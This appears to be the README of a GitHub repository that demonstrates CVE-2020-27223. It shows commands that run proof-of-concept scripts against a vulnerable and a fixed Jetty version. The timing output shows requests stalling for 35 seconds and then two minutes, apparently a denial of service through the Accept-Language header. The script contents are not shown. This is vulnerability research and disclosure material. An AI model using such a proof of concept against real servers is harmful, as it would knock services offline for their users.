motikan2010/CVE-2020-27223

CVE-2020-27223

Usage

$ mvn spring-boot:run

9.4.36.v20210114

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real	0m0.093s 🐇
user	0m0.006s
sys	0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real	0m35.339s 🐢
user	0m0.006s
sys	0m0.006s

9.4.37.v20210219 (Fixed)

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real	0m0.023s 🐇
user	0m0.005s
sys	0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real	0m0.024s 🐇
user	0m0.006s
sys	0m0.006s

PoC

$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received

real	2m0.025s
user	0m0.016s
sys	0m0.009s

References

About

CVE-2020-27223 Vulnerability App & PoC
